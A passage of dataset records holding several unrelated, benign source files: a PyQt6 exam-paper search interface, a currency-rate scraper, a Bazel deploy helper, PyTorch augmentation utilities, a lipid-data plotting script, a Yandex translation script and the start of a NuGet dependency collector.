paper.setFont(self.font)\n paper.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n paper.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n # Create an SUBJECT WIDGET\n self.subject_list = QComboBox()\n self.subject_list.setFont(self.font)\n self.subject_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \" \n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n \n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar:vertical {\" # 滚动条样式\n \"width: 10px;\\n\"\n \"height: 100px;\"\n \"background-color: white; }\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar::handle:vertical {\\n\" # 滚动条样式\n \"background: black;}\\n\"\n )\n self.subject_list.setEditable(True)\n subject_data = PaperData()\n subject_list_arr = subject_data.subject()\n self.subject_list.addItems(subject_list_arr)\n\n # Create an YEAR WIDGET\n self.year_list = QComboBox()\n self.year_list.setFont(self.font)\n self.year_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar:vertical {\" # 滚动条样式\n \"width: 10px;\\n\"\n \"height: 100px;\"\n \"background-color: white; }\\n\"\n\n \"QComboBox QAbstractScrollArea QScrollBar::handle:vertical {\\n\" # 滚动条样式\n \"background: black;}\\n\"\n )\n self.year_list.setEditable(True)\n year_data = PaperData()\n each_year = year_data.year()\n self.year_list.addItems(each_year)\n\n # Create an SEASON WIDGET\n self.season_list = QComboBox()\n self.season_list.setFont(self.font)\n self.season_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n )\n self.season_list.setEditable(True)\n self.season_list.addItems(['summer', 'winter', 'march'])\n\n # Create an PAPER WIDGET\n self.paper_list = QComboBox()\n self.paper_list.setFont(self.font)\n self.paper_list.setStyleSheet(\n \"QComboBox {\"\n \"border:5px solid black; \"\n \"padding:5px; \"\n \"font-size:22px; \"\n \"font-family:Share tech;\"\n \"color: black;\\n\"\n \"line-height:24px; }\\n\"\n\n \"QComboBox:drop-down {\" # 选择箭头样式\n \"width:20px; \"\n \"height:20px; \"\n \"border: 0; \"\n \"margin-right: 5px;\"\n \"subcontrol-position: right center; \" # 位置\n \"subcontrol-origin: padding;}\\n\" # 对齐方式\n\n \"QComboBox:down-arrow {\" # 选择箭头,继承drop-down\n \"border: none; \"\n \"background: transparent; \"\n \"image: url(\\\"./icons/arrow-down-filling.png\\\");}\\n\"\n\n \"QComboBox QAbstractItemView {\" # 下拉选项样式\n \"color:black; \"\n \"background: '#ECECEC'; \"\n \"selection-color: white;\"\n \"selection-background-color: black;\"\n \"}\\n\"\n )\n self.paper_list.setEditable(True)\n self.paper_list.addItems(['11', '12', '13', '...'])\n\n # Create a BUTTON WIDGET\n # 如果由多个object在图像中,需要谨慎加padding, margin。\n button = QPushButton(\"SEARCH\")\n button.setCursor(QCursor(QtCore.Qt.CursorShape.PointingHandCursor))\n button.setStyleSheet(\n \"*{border: 6px solid '#111111';\" +\n \"border-radius: 12px;\" +\n \"font-size: 30px;\" +\n \"font-weight: semi-bold;\"\n \"color: 'black';\" +\n \"padding: 10px 0;\" +\n \"margin: 0px 5px 35px}\" +\n \"*:hover{background: '#111111'; color: 'white'}\"\n )\n button.clicked.connect(self.search_button)\n # 直接等于函数名字,即可应用函数,不需要加括号\n\n # add the widget into a vertical layout\n subject_layout.addWidget(subject)\n subject_layout.addWidget(self.subject_list)\n\n year_layout.addWidget(year)\n year_layout.addWidget(self.year_list)\n\n season_layout.addWidget(season)\n season_layout.addWidget(self.season_list)\n\n paper_layout.addWidget(paper)\n paper_layout.addWidget(self.paper_list)\n\n # put all the widget component into a horizontal layout\n selection_layout.addLayout(subject_layout)\n selection_layout.addLayout(year_layout)\n selection_layout.addLayout(season_layout)\n selection_layout.addLayout(paper_layout)\n\n # add the widget into main vertical layout\n v_layout.addWidget(label)\n v_layout.addLayout(selection_layout)\n v_layout.addWidget(button)\n\n main_frame = QWidget()\n self.setCentralWidget(main_frame)\n main_frame.setLayout(v_layout)\n\n def search_button(self):\n current_subject = self.subject_list.currentText()\n current_year = self.year_list.currentText()\n current_season = self.season_list.currentText()\n current_paper = self.paper_list.currentText()\n # Search for the paper, if not found then return a window that shown error\n if current_paper == \"...\":\n error = QMessageBox()\n error.setText(\"Oh, It seems you are not enter a valid paper!\")\n error.setFont(self.font)\n error.setIcon(QMessageBox.Icon.Warning)\n error.setStyleSheet(\n \"font-size: 18px;\"\n )\n error.exec()\n else:\n openUrl(current_subject, current_year, current_season, current_paper)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Main()\n window.show()\n sys.exit(app.exec())\n", "repo_name": "JackSuuu/Papering", "sub_path": "papering_ui.py", "file_name": "papering_ui.py", "file_ext": "py", "file_size_in_byte": 10612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt6.QtWidgets.QMainWindow", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QVBoxLayout", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QHBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase.addApplicationFont", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt6.QtGui.QFontDatabase.addApplicationFont", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFontDatabase", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt6.QtGui.QFont", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QFont", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 36, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 36, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 54, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QLabel", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 70, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 77, "usage_type": "call"}, {"api_name": "papering_database.PaperData", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 122, "usage_type": "call"}, {"api_name": "papering_database.PaperData", "line_number": 162, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 167, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QComboBox", "line_number": 202, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QPushButton", "line_number": 238, "usage_type": "call"}, {"api_name": "PyQt6.QtGui.QCursor", "line_number": 239, "usage_type": "call"}, {"api_name": "PyQt6.QtCore.Qt", "line_number": 239, "usage_type": "attribute"}, {"api_name": "PyQt6.QtCore", "line_number": 239, "usage_type": "name"}, {"api_name": "PyQt6.QtWidgets.QWidget", "line_number": 277, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QMessageBox", "line_number": 288, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QMessageBox.Icon", "line_number": 291, "usage_type": "attribute"}, {"api_name": "PyQt6.QtWidgets.QMessageBox", "line_number": 291, "usage_type": "name"}, {"api_name": "papering_def.openUrl", "line_number": 297, "usage_type": "call"}, {"api_name": "PyQt6.QtWidgets.QApplication", "line_number": 301, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 301, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "5244761113", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\n\nURL = \"http://www.cbr.ru/scripts/XML_daily.asp\"\n\n\ndef get_rates():\n rev = requests.get(URL)\n soup = BeautifulSoup(rev.content, \"xml\")\n\n rates = {\n i.CharCode.string: (\n Decimal(i.Value.string.replace(\",\", \".\")),\n int(i.Nominal.string),\n )\n for i in soup(\"Valute\")\n }\n\n return rates\n\n\ndef _main():\n rates = get_rates()\n\n result = (rates[\"AUD\"][0] / rates[\"AUD\"][1]) / (rates[\"BYN\"][0] / rates[\"BYN\"][1])\n print({\"cbr_course\": float(result.quantize(Decimal(\".01\")))})\n\n\nif __name__ == \"__main__\":\n _main()\n", "repo_name": "ultach/rocbank", "sub_path": "parse_cbr.py", "file_name": "parse_cbr.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 14, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "15759998198", "text": "import json\n\ndef run_command(args):\n deploy_template = \"bazel build --crosstool_top=//:arm_toolchain //tasks/{name}:{name}\"\n with open(args.config, \"r\") as f:\n dump = json.load(f)\n applications = dump[\"applications\"]\n cmds = []\n for app in applications:\n cmds.append(deploy_template.format(name=app))\n deploy_cmd = \"cd common && \"\n deploy_cmd += \" && \".join(cmds)\n print(deploy_cmd)\n\ndef setup(subparsers):\n parser = subparsers.add_parser(\"deploy\", help=\"deploy applications to device\")\n parser.add_argument(\"-c\", \"--config\", help=\"config file for device\", required=True)\n parser.add_argument(\"-d\", \"--device\", help=\"target device name\", required=True)\n parser.set_defaults(func=run_command)\n", "repo_name": "h3x4g0ns/bmpi", "sub_path": "tools/bmpi/deploy.py", "file_name": "deploy.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "33632011096", "text": "\"\"\"Utilities for scoring the model.\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport math\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\ndef score(logits, labels):\n \"\"\"Returns the mean accuracy of a model's predictions on a set of examples.\n\n Args:\n logits (torch.Tensor): model predicted logits\n shape (examples, classes)\n labels (torch.Tensor): classification labels from 0 to num_classes - 1\n shape (examples,)\n \"\"\"\n\n assert logits.dim() == 2\n assert labels.dim() == 1\n assert logits.shape[0] == labels.shape[0]\n y = torch.argmax(logits, dim=-1) == labels\n y = y.type(torch.float)\n return torch.mean(y).item()\n\ndef increase_image_channels(images, num_out_channels, device):\n \"\"\"Updates an image with updated number of channels to feed into a pretrained model\n\n Args:\n image (torch.Tensor): batch image\n shape (B, C, H, W)\n num_out_channels: int\n \"\"\"\n temp = torch.empty((images.size(0), num_out_channels, images.size(2), images.size(3)))\n\n image_mean = torch.mean(images, axis = 1)\n for i in range(num_out_channels):\n if i < images.size(1):\n temp[:, i, :, :] = images[:, i, :, :]\n else:\n temp[:, i, :, :] = image_mean\n \n return temp.to(device)\n\n\n\nclass aug_net_block(nn.Module):\n\n def __init__(\n self,\n in_channel,\n out_channel,\n kernel_size,\n aug_noise_prob,\n num_augs,\n identity_init_off\n ):\n \"\"\"Inits the augmentation network for MetaAugNet on MAML\"\"\"\n super(aug_net_block, self).__init__()\n \n if identity_init_off:\n # Default initialization for conv layer in PyTorch\n # Uniform with min and max proportional to inverse sqrt of total kernel size\n n = in_channel\n n = kernel_size*kernel_size\n stdv = 1. / math.sqrt(n)\n\n self.conv_param = nn.Parameter(nn.init.uniform_(\n torch.empty(\n out_channel,\n in_channel,\n kernel_size,\n kernel_size,\n requires_grad=True,\n device = DEVICE\n ),\n a = -stdv, \n b = stdv\n ))\n self.conv_bias = nn.Parameter(nn.init.uniform_(\n torch.empty(\n out_channel,\n requires_grad=True,\n device = DEVICE\n ),\n a = -stdv,\n b = stdv\n ))\n else: \n self.conv_param = nn.Parameter(nn.init.normal_(\n torch.empty(\n out_channel,\n in_channel,\n kernel_size,\n kernel_size,\n requires_grad=True,\n device = DEVICE\n ),\n mean =0,# 0.000001\n std = 1e-8\n ))\n self.conv_bias = nn.Parameter(nn.init.zeros_(\n torch.empty(\n out_channel,\n requires_grad=True,\n device = DEVICE\n )\n )) \n \n self.conv_identity_weight = nn.init.dirac_(\n torch.empty(\n out_channel, \n in_channel, \n kernel_size, \n kernel_size, \n requires_grad = False,\n device = DEVICE\n )\n )\n\n self.aug_noise_prob = aug_noise_prob\n self.num_augs = num_augs\n\n def forward(self, x):\n \"\"\"x: input image (N*S, C, H, W)\"\"\"\n res = F.conv2d(input = x, weight = self.conv_identity_weight, bias = None, padding = 'same', stride = 1)\n x = F.conv2d(\n input = x,\n weight = self.conv_param,\n bias = self.conv_bias,\n stride = 1,\n padding = 'same'\n )\n\n B, C, H, W = x.size()\n tB = int(B / self.num_augs)\n # new way of generating augs\n noise = torch.cat([nn.init.normal_(torch.empty((tB, C, H, W), \n requires_grad = False, \n device = DEVICE), \n mean = 0, \n std = 0.1*torch.std(x.detach()).item()\n ) if random.uniform(0,1) < self.aug_noise_prob else nn.init.zeros_(torch.empty((tB, C, H, W), \n requires_grad = False, \n device = DEVICE)\n ) for _ in range(self.num_augs)\n ], \n dim = 0\n )\n assert noise.size() == x.size()\n x = x + noise\n # if random.uniform(0,1) < self.aug_noise_prob:\n \n # x = x + nn.init.normal_(\n # torch.empty(\n # x.size(),\n # requires_grad=False,\n # device=DEVICE\n # ),\n # mean = 0,\n # std = 0.1*torch.std(x.detach()).item()\n # )\n x = F.layer_norm(x, x.shape[1:])\n x = torch.clamp(x, min=0)\n return x + res\n\nclass mean_pool_along_channel(nn.Module):\n def __init__(self):\n super(mean_pool_along_channel, self).__init__()\n\n def forward(self, x):\n assert len(x.shape) == 4\n return torch.mean(x, dim = [2,3])\n\n\nclass manual_relu(nn.Module):\n\n def __init__(\n self\n ):\n\n super(manual_relu, self).__init__()\n\n def forward(self, x):\n return torch.max(x, 0)\n\n\n\n ", "repo_name": "alexzfan/MetaAugNet", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 6026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.init.uniform_", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.init.uniform_", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.init.dirac_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 139, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn.init.zeros_", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn.functional.layer_norm", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 168, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 186, "usage_type": "call"}]} +{"seq_id": "12071636792", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n## figure settings\nfig,ax = plt.subplots(1,2,figsize=(13,6))\np0 = ax[0].twinx()\np1 = ax[1].twinx()\n\n\n## Number of lips vs poly/lip ratio\nelements = [\\\n['POPC',[2,4],[40.1,17.0],'skyblue','blue',[4.27,3.49]],\\\n['DMPC',[0.5,1.0,2.0],[96.6,74.9,42.8],'pink','red',[5.06,4.50,3.83]]]\n\nfor element in elements:\n name = element[0]\n Ratio = element[1]\n Nlip = element[2]\n color = element[3]\n color2 = element[4]\n Radius = element[5]\n\n ax[0].plot(Ratio,Nlip,linestyle='none',marker='s',markersize=9,color=color,label='Number of lipids, %s' % name)\n p0.plot(Ratio,Radius,linestyle='none',marker='x',markersize=6,color=color2,label='Average radius, %s' % name)\n\nax[0].plot([0,5],[15,15],linestyle='--',color='grey',label='estimate of phase transition')\n#ax[0].plot([0,5],[15,15],linestyle='--',color='grey',label='estimate of phase transition, discoidal -> spherical lipid particle')\nax[0].set_xlabel('Polymer/lipid ratio, R')\nax[0].set_ylabel('Number of lipids')\nax[0].set_ylim(0,100)\nax[0].set_xlim(0,5)\nax[0].text(2.0,70,'0 mol%s Chol' % '%')\n#ax[0].legend(loc='upper center',bbox_to_anchor=(1.1,1.1),fancybox=True,shadow=True,ncol=5)\nax[0].legend(loc='upper left',bbox_to_anchor=(1.2,.5),prop={'size':10},frameon=False)\np0.legend(loc='upper left',bbox_to_anchor=(1.2,.38),prop={'size':10},frameon=False)\n\nR_lim = [3.,5.15]\nR_ylabel = 'Radius [nm]'\np0.set_ylabel(R_ylabel)\np0.set_ylim(R_lim)\n\n## Number of lips vs chol\nelements = [\\\n#['POPC',[0,10,20,20],[17.1,13.8,5.5,5.7],'skyblue','blue',4,[34.9,34.3,30.4,31.9]],\\\n['POPC',[0,8,18,15],[17.0,13.8,5.6,5.9],'skyblue','blue',4,[3.49,3.43,3.04,3.20]],\\\n['DMPC',[0,1.4,1.4,3.3],[42.8,33.4,28.7,6.2],'pink','red',2,[3.83,3.63,3.67,3.10]]]\n\nfor element in elements:\n name = element[0]\n chol = element[1]\n Nlip = element[2]\n color = element[3]\n color2 = element[4]\n #Ratio = element[5]\n Radius= element[6]\n\n ax[1].plot(chol,Nlip,linestyle='none',marker='s',markersize=9,color=color,label='Number of lipids, %s' % name)\n p1.plot(chol,Radius,linestyle='none',marker='x',markersize=6,color=color2,label='Average radius, %s' % name)\n\nPT = 15 # estimate of phase transition\nax[1].plot([-1,21],[PT,PT],linestyle='--',color='grey',label='estimate of phase transition, discoidal -> spherical lipid particle') \nax[1].set_xlabel('mol%s cholesterol' % '%')\nax[1].set_ylabel('Number of lipids')\nax[1].set_ylim(0,100)\nax[1].set_xlim(-1,21)\nax[1].text(3.5,70,'R=4 for POPC, R=2 for DMPC')\n\np1.set_ylabel(R_ylabel)\np1.set_ylim(R_lim)\n\nplt.tight_layout()\nplt.savefig('output/Nlip.png')\nplt.show()\n\n", "repo_name": "andreashlarsen/Lenz2022-DIBMALPs", "sub_path": "plot_chol_vs_Nlip.py", "file_name": "plot_chol_vs_Nlip.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "27834515027", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n############################################################################################################\n#### Translates a piece of text or a word\n#### Automatic language detection\n#### Written by Vladimir Yakovlev \n#### Version 0.1.1\n############################################################################################################\n\n# All this packages should be available on any fresh macOS installation\nimport sys\nimport os\nimport json\nimport httplib\nimport urllib\nimport datetime\nimport string\n\n# Configuration goes here\nLOCAL = \"ru\" # change to your native or desired language, e.g. ru = Russian (see https://tech.yandex.ru/translate/doc/dg/concepts/api-overview-docpage/)\nFOREIGN = \"en\" # change to you desired foreign language, e.g. en = English\n\nAPIKEY = os.environ.get('APIKEY')\nif APIKEY is None:\n sys.stdout.write(\"APIKEY is not defined (see manual)\")\n sys.exit(1)\n\nif len(sys.argv) != 2:\n sys.stdout.write(\"Can't translate nothing\")\n sys.exit(2)\n\nINPUT=sys.argv[1]\n\n# get a json object from a request\ndef get_json(endpoint):\n conn = httplib.HTTPSConnection(\"translate.yandex.net\",\"443\")\n headers = {'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*'}\n params = urllib.urlencode({'text': INPUT})\n conn.request(\"POST\",\"/api/v1.5/tr.json/%s&key=%s\" % (endpoint, APIKEY), params, headers)\n\n response = conn.getresponse()\n\n if response.status != 200: # something nasty happened\n return None\n else:\n return json.loads(response.read()) # returns a json object for further work\n\n\n############################################################################################################\n#### Main Part\n############################################################################################################\nif __name__ == \"__main__\":\n src_json = get_json(\"detect?hint=%s,%s\" % (LOCAL, FOREIGN))\n if src_json == None or 'lang' not in src_json:\n sys.stdout.write(\"WARNING: Can't detect language for %s\" % INPUT)\n sys.exit(-1)\n\n # detects from/to languages key-pair\n source = src_json['lang']\n destination = FOREIGN\n if source != LOCAL:\n destination = LOCAL\n\n # tries to translate\n translation = get_json(\"translate?lang=%s-%s\" % (source, destination))\n if translation == None or 'text' not in translation:\n sys.stdout.write(\"WARNING: Can't translate %s from %s to %s\" % (INPUT, source, destination))\n sys.exit(-2)\n\n sys.stdout.write(translation['text'][0]) # all went good\n sys.exit(0)", "repo_name": "vyakovlev/alfred-ya.translator", "sub_path": "ya.translator.py", "file_name": "ya.translator.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "httplib.HTTPSConnection", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "29567716903", "text": "from bs4 import BeautifulSoup\r\nimport glob\r\nfrom dependencyCollectorBase import DependencyCollectorBase\r\nimport re\r\nimport requests\r\nfrom random import randint\r\n\r\n\r\nclass NuGetPackageDependencyCollector(DependencyCollectorBase):\r\n 